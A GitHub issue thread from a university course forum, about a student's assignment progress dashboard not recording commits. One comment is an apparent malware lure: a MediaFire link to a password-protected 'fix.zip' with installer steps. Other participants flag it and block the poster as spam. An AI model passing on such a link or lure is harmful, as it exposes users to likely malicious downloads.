### ISSUE TITLE
iP progress dashboard does not record progress

### ISSUE THREAD

**Issue by yadobler** [nus-cs2103-AY2425S1/forum#72]
It is 26-August-2024, 1800pm. The iP Progress dashboard was last updated at **2024-08-26 10:10**:
![20240826-181000-original](https://github.com/user-attachments/assets/d0d475d6-550b-497f-ac74-0bd9a278bafa)

My current progress status:
![20240826-181020-original](https://github.com/user-attachments/assets/addddda2-3584-4f1e-ab69-7504ef42da01)

I can see that the admin column did detect my fork (and that I had not enable issue tracking) but it is not tracking my commits:
![20240826-181123-original](https://github.com/user-attachments/assets/6581acd3-1a93-4d63-8b5d-027123a8ef86)

I noted another issue mentioned [here](https://github.com/nus-cs2103-AY2425S1/forum/issues/25#issue-2479509826), but both RepoSense (iP code dashboard) and the iP Progress dashboard have not updated the progress.

Is there anything wrong with my tagging or commits in my [fork](https://www.github.com/yadobler/ip)? 

Thank you in advance

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yadobler** [comment]
### EDIT: DO NOT CLICK ABOVE MEDIAFIRE LINK!

**Comment by damithc** [comment]
Blocked the user and reported spam. The comment should be hidden now.
@yadobler Thanks for the heads up

**Comment by damithc** [comment]
@yadobler It's possible the tags were pushed to the fork only after the dashboard's last update. I see that your increments up to Level 6 are now green, after the most recent dashboard update.

**Comment by yadobler** [comment]
@damithc Thank you! Seems like the changes take a while before the dashboard can retrieve them
